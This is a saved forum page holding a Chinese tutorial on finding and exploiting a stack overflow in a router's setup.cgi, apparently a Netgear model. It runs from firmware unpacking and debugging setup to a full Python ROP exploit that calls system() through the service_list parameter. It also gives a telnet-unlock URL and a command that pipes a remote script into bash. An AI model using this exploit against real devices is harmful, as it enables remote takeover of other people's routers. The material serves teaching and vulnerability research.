ZwdGZ5JywncUs5UUN3MCcsJ3QwdnpBdW0nLCd2dS9jUWM0dycsJ2pLQ1NtMksnLCdXUWJHV1A5NldPTycsJ3hjR0drTFcnLCdXT2oxVzVMNldRMCcsJ0F3NVBEYScsJ3kyblZ3dm0nLCd6M0R0RUx5JywnVzdwZEhNTmRUZjgnLCdFS2VUd0w4JywnQTBYSXJ3eScsJ0F3OVVpY08nLCdXT3hjVE5KY1Ztb3InLCdCMmpRendtJywndjJqbXl2YScsJ3JoTHJ1MjAnLCdXT2RkVXROY0w4a3UnLCd1bW9CV1BlRldRTycsJ3pLRHV2TTgnLCdiVzdjUENvRFc0ZScsJ0VmdnRFeGEnLCdXUS9jTjIvY0pDb3YnLCd6MHZ5c3d1JywnbmFOY0lTb3BXN2knLCdBdzlVJywnZGNsZFVXMXMnLCdCZ3ZVejNxJywnQ05yZnVlZScsJ0QySFBCZ3UnLCd5MjlTJywndEt6eEEyRycsJ3ZTa2JXUGlQQ3EnLCd6dzUwJywnRE1XTmZxNCcsJ0ZkYjhtTlcnLCdzbW90ZHVsZE9XJywnV09yNlc0SGZXUlcnLCdXUGhkVlhwY1FTazcnLCdBaHp1cjBpJywneHd6emY4bzQnLCdibWtFczhvZGNhJywneXMxNnFzMCcsJ3ZnakxzME8nLCdyZT
|
|||
|
|
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-comment,.hljs-variable{color:green}.hljs-built_in,.hljs-keyword{color:#00f}.hljs-string,.hljs-title{color:#a31515}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#FFEBE9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#ffffff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body h1{margin:0.67em 0;padding-bottom:0.3em;font-size:2em;border-bottom:1px solid var(--color-border-muted)}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:0.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body h1,.markdown-body h2,.markdown-body h3,.markdown-body h4{margin-top:24px;margin-bottom:16px;font-weight:600;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h3{font-weight:600;font-size:1.25em}.markdown-body h4{font-weight:600;font-size:1em}.markdown-body blockquote{margin:0;padding:0 1em;color:var(--color-fg-muted);border-left:0.25em solid var(--color-border-default)}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:
|
|||
|
|
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<script src="/static/js/html5shiv.min.js"></script>
|
|||
|
|
<script src="/static/js/respond.min.js"></script>
|
|||
|
|
<![endif]-->
|
|||
|
|
<style>.hot{z-index:10}</style>
|
|||
|
|
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
|
|||
|
|
<body>
|
|||
|
|
<div class="global-nav mb-50">
|
|||
|
|
<nav class="navbar navbar-inverse navbar-fixed-top">
|
|||
|
|
<div class="container nav">
|
|||
|
|
<div class="visible-xs header-response sf-hidden">
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="row hidden-xs">
|
|||
|
|
<div class="col-sm-9 col-md-9 col-lg-9">
|
|||
|
|
<div class=navbar-header>
|
|||
|
|
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</button>
|
|||
|
|
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
|
|||
|
|
</div>
|
|||
|
|
<div class="collapse navbar-collapse" id=global-navbar>
|
|||
|
|
<ul class="nav navbar-nav">
|
|||
|
|
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/questions>问答</a></li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/shop>商城</a></li>
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
|
|||
|
|
<li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
|
|||
|
|
<span class=hot>NEW</span>
|
|||
|
|
</li>
|
|||
|
|
<li><a href=https://forum.butian.net/movable>活动</a></li>
|
|||
|
|
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
|
|||
|
|
|
|||
|
|
</li>
|
|||
|
|
</ul>
|
|||
|
|
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
|
|||
|
|
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
|
|||
|
|
<input type=text name=word id=searchBox class=form-control placeholder value>
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</nav>
|
|||
|
|
</div>
|
|||
|
|
<div class="top-alert mt-60 clearfix text-center">
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
|
|||
|
|
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
|
|||
|
|
</div>
|
|||
|
|
<![endif]-->
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class=wrap>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class="row mt-10">
|
|||
|
|
<div class="col-xs-12 col-md-9 main" style=width:100%>
|
|||
|
|
<div class=widget-article>
|
|||
|
|
<h3 class="title word-wrap">从零开始的路由器漏洞挖掘之旅</h3>
|
|||
|
|
<ul class=taglist-inline>
|
|||
|
|
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/51>硬件与物联网</a></li>
|
|||
|
|
</ul>
|
|||
|
|
<div class="content mt-10">
|
|||
|
|
<div class="quote mb-20">
|
|||
|
|
虽然目前已经有了很多很多路由器漏洞挖掘的文章资料,但是适合新手入门的、涉及环境配置细节的教学文章还是比较少,本文将带你一步步学习如何从零开始挖掘某厂商路由器的漏洞,通过实际操作和工具使用,深入了解固件分析、动态调试和漏洞利用的全过程,希望可以帮助读者少走一些弯路。
|
|||
|
|
</div>
|
|||
|
|
<textarea id=md_view_content style=display:none>虽然目前已经有了很多很多路由器漏洞挖掘的文章资料,但是适合新手入门的、涉及环境配置细节的教学文章还是比较少,本文将带你一步步学习如何从零开始挖掘某厂商路由器的漏洞,通过实际操作和工具使用,深入了解固件分析、动态调试和漏洞利用的全过程,希望可以帮助读者少走一些弯路。
|
|||
|
|
|
|||
|
|
固件分析
|
|||
|
|
----
|
|||
|
|
|
|||
|
|
### 安装和配置binwalk
|
|||
|
|
|
|||
|
|
Binwalk是一个固件分析工具,可以帮助我们提取和分析嵌入式固件镜像。首先,按照以下步骤安装binwalk:
|
|||
|
|
|
|||
|
|
> binwalk作者为Ubuntu系统定制了依赖的安装脚本,直接执行deps.sh,免去大部分烦恼!
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
git clone https://github.com/ReFirmLabs/binwalk
|
|||
|
|
cd binwalk
|
|||
|
|
sudo python3 setup.py install
|
|||
|
|
sudo ./deps.sh
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
在开始漏洞挖掘之前,我们需要下载并解包路由器的固件。本文以某厂商路由器为例,首先从[官网](https://www.netgear.com/support/product/R6260.aspx)下载固件,然后使用binwalk进行解包:
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
binwalk -Me <firmware_file>
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
### 漏洞分析
|
|||
|
|
|
|||
|
|
#### 目标漏洞信息
|
|||
|
|
|
|||
|
|
目标路由器属于MIPSEL架构,漏洞二进制位于setup.cgi(许多路由器的漏洞都位于CGI中,所以可以多看看,而且也比较容易利用)
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
file setup.cgi
|
|||
|
|
setup.cgi: ELF 32-bit LSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
main函数在`setup_main`
|
|||
|
|
|
|||
|
|
#### 逆向
|
|||
|
|
|
|||
|
|
`sub_555BA950`从nvram中获取了环境变量`fw_out_rules`的值,没有进行长度检查,在`sscanf`格式化写入到`v16`导致栈溢出。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
通过交叉引用`fw_out_rules`可以发现该环境变量在`sub_55567D8C`被设置。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
交叉引用上面所说的两个函数 可以发现都是通过`ActionTab`方式按名调用,分别是`rule_list_simple_out`和`outmove`可以在固件解包的目录下`grep`搜索对应的字符串找到对应的外部接口,下面结合前端后端进行分析。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
直接访问`fw_rules.htm`,搞几个规则,使用 `nvram show | grep fw_out_rules` 可以看到这个变量储存的是Service name还有一些数字啥的。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
所以我们需要控制请求里的 `service_list`参数,来修改`fw_out_rules`,最后访问`BKS_service_add.htm`触发栈溢出。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
动态调试
|
|||
|
|
----
|
|||
|
|
|
|||
|
|
### 路由器配置
|
|||
|
|
|
|||
|
|
#### 开启telnet
|
|||
|
|
|
|||
|
|
虽然该款路由器开启调试的方式早已公开,但是为了弄清楚细节,最好的办法是手工逆一下。
|
|||
|
|
|
|||
|
|
其中函数`CallActionByName`通过查`ActionTab`表比对参数`todo`的值方式来调用函数`todo`中的参数对应函数
|
|||
|
|
|
|||
|
|
&lt;img src="<https://s2.loli.net/2022/01/13/9WGF231OVSjyheT.png>" alt="image-20220107154406516" style="zoom: 67%;" /&gt;
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
注意到这个部分在许多函数中都有出现,搜索发现是一个为了修CNNVD-201306-024而写的一个check([IoT 分析 | 路由器漏洞频发,mirai 新变种来袭 - 云+社区 - 腾讯云 (tencent.com)](https://cloud.tencent.com/developer/article/1366157))。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
所以可以通过`todo=debug`开启telnet
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
192.168.1.1/setup.cgi?todo=debug
|
|||
|
|
telnet 192.168.1.1
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 编译gdbserver
|
|||
|
|
|
|||
|
|
在路由器上也要进行相应的调试配置
|
|||
|
|
|
|||
|
|
注意路由器是小端序,参数加上-EL
|
|||
|
|
|
|||
|
|
[搭建iot动态调试环境\_九层台-CSDN博客](https://blog.csdn.net/qq_38204481/article/details/105391866)
|
|||
|
|
|
|||
|
|
```sh
|
|||
|
|
sudo apt-get install linux-libc-dev-mipsel-cross
|
|||
|
|
sudo apt-get install libc6-mipsel-cross libc6-dev-mipsel-cross
|
|||
|
|
sudo apt-get install binutils-mipsel-linux-gnu gcc-mipsel-linux-gnu
|
|||
|
|
sudo apt-get install g++-mipsel-linux-gnu
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```sh
|
|||
|
|
wget https://ftp.gnu.org/gnu/gdb/gdb-10.1.tar.xz
|
|||
|
|
tar xvf gdb-10.1.tar.xz
|
|||
|
|
cd gdb-10.1
|
|||
|
|
CC="mips-linux-gnu-gcc -EL" CXX="mips-linux-gnu-g++" ./configure --target=mips-linux-gnu --host="mips-linux-gnu" --prefix="/root/tgdb" LDFLAGS="-static"
|
|||
|
|
make -j7
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
编译不了,不知道为啥(
|
|||
|
|
|
|||
|
|
这里下一个
|
|||
|
|
|
|||
|
|
<https://github.com/stayliv3/gdb-static-cross/tree/master/prebuilt>
|
|||
|
|
|
|||
|
|
[HatLab Tools Library: 海特实验室IoT安全工具/环境整合 - Gitee.com](https://gitee.com/h4lo1/HatLab_Tools_Library/tree/master/%E9%9D%99%E6%80%81%E7%BC%96%E8%AF%91%E8%B0%83%E8%AF%95%E7%A8%8B%E5%BA%8F/gdbserver)
|
|||
|
|
|
|||
|
|
#### 上传gdbserver
|
|||
|
|
|
|||
|
|
比较好的办法是使用http server
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
python -m http.server 9999
|
|||
|
|
wget http://192.168.1.2:9999/gdbserver
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 附加二进制的坑点
|
|||
|
|
|
|||
|
|
由于setup.cgi不是持久存在的,需要循环attach,这个脚本可以解决。
|
|||
|
|
|
|||
|
|
```sh
|
|||
|
|
int=1
|
|||
|
|
while [ $int -le 1000 ]; do
|
|||
|
|
/tmp/gdbserver 0.0.0.0:12345 --attach `ps -A | grep setup.cgi | awk '{print $1}' | head -n 1`
|
|||
|
|
done
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
### 调试端配置
|
|||
|
|
|
|||
|
|
环境: Ubuntu 21
|
|||
|
|
|
|||
|
|
#### 安装gef
|
|||
|
|
|
|||
|
|
gef是异构动态调试做的比较好的一款gdb插件,推荐使用。
|
|||
|
|
|
|||
|
|
```sh
|
|||
|
|
bash -c "$(wget http://gef.blah.cat/sh -O -)"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### 安装gdb-multiarch
|
|||
|
|
|
|||
|
|
普通的gdb无法调试mips架构的二进制,所以你需要gdb-multiarch,Ubuntu的话直接使用apt就可以进行安装了。
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
sudo apt install gdb-multiarch
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### gdb调试配置
|
|||
|
|
|
|||
|
|
为了让gdb正确进行调试,首先需要进行一下环境配置。
|
|||
|
|
|
|||
|
|
```sh
|
|||
|
|
set arch mips
|
|||
|
|
set endian little
|
|||
|
|
gef-remote 192.168.1.1:12345
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
在调试过程可以断到gadget,以及加载libc符号,如果觉得每次敲gdb命令比较繁琐,可以将gdb的命令保存成文件,然后在使用`gdb-multiarch`通过`-x`选项直接通过文件加载命令:
|
|||
|
|
|
|||
|
|
```sh
|
|||
|
|
set arch mips
|
|||
|
|
set endian little
|
|||
|
|
gef-remote 192.168.1.1:12345
|
|||
|
|
b *0x555BAC2C
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```sh
|
|||
|
|
gdb-multiarch setup.cgi -x ./gdb.cmd
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
IDA反汇编出来的base可能跟实际基址不一样,可以调出实际的基址再rebase一下。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
漏洞利用
|
|||
|
|
----
|
|||
|
|
|
|||
|
|
### 函数栈
|
|||
|
|
|
|||
|
|
mips调用函数时将返回地址放在 `$ra`,与x86架构类似,在函数起始处压栈,结束时弹出,通过`ja`指令跳到返回地址,所以需要溢出到`var_s24`来劫持控制流。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
### 执行system
|
|||
|
|
|
|||
|
|
介绍一下 mips 下神奇的函数调用:
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
在这里跳到 `$t9` 也就是 `system` 之后,会执行一下下面的那条语句(也就是 `5B068` 处的语句)之后才继续在 system 里面执行
|
|||
|
|
|
|||
|
|
那么这个gadget 我们就可以把 sp + 0xa8 + 0x88 处放一个`command`的指针,这样就会调用 `system(ptr)` 了
|
|||
|
|
|
|||
|
|
然后执行命令可以执行 `ping` 命令(其中 ping 需要绝对路径,需要注意):
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
/bin/ping hv14uf.dnslog.cn -c 2
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
### 寻找gadgets
|
|||
|
|
|
|||
|
|
MIPS架构推荐使用`ropper`进行查找,查找时可以参考可被控制的寄存器来筛选gadget。
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
file setup.cgi
|
|||
|
|
search addiu $a0
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
一开始找到了这个,后来发现怎么也打不通
|
|||
|
|
|
|||
|
|
```assembly
|
|||
|
|
0x5556af20: addiu $a0, $sp, 0x18; lw $ra, 0x5c($sp); lw $v0, 0x18($sp); jr $ra; addiu $sp, $sp, 0x60;
|
|||
|
|
0x55567650: la $t9, system; nop; jalr $t9; nop;
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
后来翻了翻[CTF中常见的C语言输入函数截断属性总结 | Clang裁缝店 (xuanxuanblingbling.github.io)](https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/16/input/)发现是0x20截断了,所以我们system执行的`command`也需要[绕过空格](https://blog.csdn.net/qq_43427482/article/details/109725672)。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
同时在`FindForbidValue`函数里也check了一些敏感字符/关键字,包含这些字符的请求包将会被丢弃。
|
|||
|
|
|
|||
|
|
&lt;img src="<https://s2.loli.net/2022/01/13/1r5sHdV8MGNlgLY.png>" alt="image-20220112183944202.png" style="zoom: 67%;" /&gt;
|
|||
|
|
|
|||
|
|
后来还是用原来的(,将`command`写到 `$a0-0x60`上,跳到`0x55567650`执行就行了。
|
|||
|
|
|
|||
|
|
```assembly
|
|||
|
|
0x55592ce4: addiu $a0, $a0, -0x60; lw $ra, 0x1c($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
|
|||
|
|
0x55567650: la $t9, system; nop; jalr $t9; nop;
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
如果你也比较懒的的话,可以用`cyclic -l`来找偏移。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
调试时发现`$a0`的值会随长度变化而变化,所以得填充一下,调试时用的长度500,这里也pad到500,如果想执行更长的命令,可以增加一下payload长度。
|
|||
|
|
|
|||
|
|
### 最终exp
|
|||
|
|
|
|||
|
|
```python
|
|||
|
|
import requests,re
|
|||
|
|
import base64
|
|||
|
|
url = "http://192.168.1.1/"
|
|||
|
|
user = "aaaa"
|
|||
|
|
pwd = "xxxx!"
|
|||
|
|
command = '/bin/ping xxx.dnslog.cn -c 4'
|
|||
|
|
command = command.replace(" ", "${IFS}")
|
|||
|
|
auth = "Basic " + base64.b64encode((user + ":" + pwd).encode()).decode("utf-8")
|
|||
|
|
|
|||
|
|
def login():
|
|||
|
|
get_sessionid = requests.get(url)
|
|||
|
|
sessionid = get_sessionid.headers["Set-Cookie"]
|
|||
|
|
headers = {
|
|||
|
|
"Authorization" : auth,
|
|||
|
|
"Cookie" : sessionid
|
|||
|
|
}
|
|||
|
|
r = requests.get(url,headers = headers)
|
|||
|
|
if r.status_code == 200:
|
|||
|
|
print("[+] Login success!")
|
|||
|
|
return sessionid
|
|||
|
|
else:
|
|||
|
|
print("[-] Login failed!")
|
|||
|
|
exit(0)
|
|||
|
|
|
|||
|
|
def get_sid(sessionid):
|
|||
|
|
headers = {
|
|||
|
|
"Authorization" : auth,
|
|||
|
|
"Cookie" : sessionid
|
|||
|
|
}
|
|||
|
|
get_sid = requests.get(url + "fw_rules.htm",headers = headers)
|
|||
|
|
sid = re.findall(r'\?id=[a-f0-9]+', get_sid.content.decode("utf-8"))
|
|||
|
|
return sid[0]
|
|||
|
|
|
|||
|
|
def attack(sessionid):
|
|||
|
|
attackurl = url + "setup.cgi" + get_sid(sessionid)
|
|||
|
|
payload = "a" * 376
|
|||
|
|
payload += "%e4%2c%59%55" # ra = 0x55592ce4: addiu $a0, $a0, -0x60; lw $ra, 0x1c($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
|
|||
|
|
payload += "b" * 0x1c
|
|||
|
|
payload += "%50%76%56%55" # ra = 0x55567650: la $t9, system; nop; jalr $t9; nop;
|
|||
|
|
payload += "c" * 8
|
|||
|
|
payload += "%0a{}%0a".format(command)
|
|||
|
|
pad = 500 - (len(payload) - 4)
|
|||
|
|
if(pad >= 0):
|
|||
|
|
payload += "c" * pad # pad len to 500
|
|||
|
|
print("[+] Attack start")
|
|||
|
|
print(attackurl,payload)
|
|||
|
|
data = "save=Apply&service_list=" + payload + "&fwout_action=0&fwout_laniptype=anyip&fwout_waniptype=anyip&fwout_logging=1&h_fwout_action=0&h_fwout_laniptype=anyip&h_fwout_waniptype=anyip&h_fwout_logging=1&h_service_list=AIM&c4_lan_start_ip=192.168.1.NaN&c4_lan_finish_ip=192.168.1.NaN&c4_wan_start_ip=&c4_wan_finish_ip=&h_ruleSelect=0&edit=0&todo=save&this_file=rule_out.htm&next_file=BKS_service_add.htm&SID="
|
|||
|
|
headers = {
|
|||
|
|
"Cookie" : sessionid,
|
|||
|
|
"Authorization" : auth
|
|||
|
|
}
|
|||
|
|
r = requests.post(url = attackurl,data = data,headers = headers)
|
|||
|
|
if r.status_code:
|
|||
|
|
print("[+] Attack success!, the result is:")
|
|||
|
|
print(r.content)
|
|||
|
|
else:
|
|||
|
|
print("[-] Attack failed!")
|
|||
|
|
exit(0)
|
|||
|
|
|
|||
|
|
sessionid = login()
|
|||
|
|
attack(sessionid)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
ref
|
|||
|
|
===
|
|||
|
|
|
|||
|
|
[TP-Link WR841N 栈溢出漏洞(CVE-2020-8423)分析 - Lonely Blog (wuhao13.xin)](https://blog.wuhao13.xin/174.html)
|
|||
|
|
|
|||
|
|
[HWS赛题 入门 MIPS Pwn | Clang裁缝店 (xuanxuanblingbling.github.io)](https://xuanxuanblingbling.github.io/ctf/pwn/2020/09/24/mips/)
|
|||
|
|
|
|||
|
|
[思科路由器 RV110W CVE-2020-3331 漏洞复现 | Clang裁缝店 (xuanxuanblingbling.github.io)](https://xuanxuanblingbling.github.io/iot/2020/10/26/rv110w/)</textarea>
|
|||
|
|
<div id=layer-photos-demo>
|
|||
|
|
<div id=md_view><div class=markdown-body><p blockindex=0>虽然目前已经有了很多很多路由器漏洞挖掘的文章资料,但是适合新手入门的、涉及环境配置细节的教学文章还是比较少,本文将带你一步步学习如何从零开始挖掘某厂商路由器的漏洞,通过实际操作和工具使用,深入了解固件分析、动态调试和漏洞利用的全过程,希望可以帮助读者少走一些弯路。</p>
|
|||
|
|
<h2 blockindex=1>固件分析</h2>
|
|||
|
|
<h3 blockindex=2>安装和配置binwalk</h3>
|
|||
|
|
<p blockindex=3>Binwalk是一个固件分析工具,可以帮助我们提取和分析嵌入式固件镜像。首先,按照以下步骤安装binwalk:</p>
|
|||
|
|
<blockquote blockindex=4>
|
|||
|
|
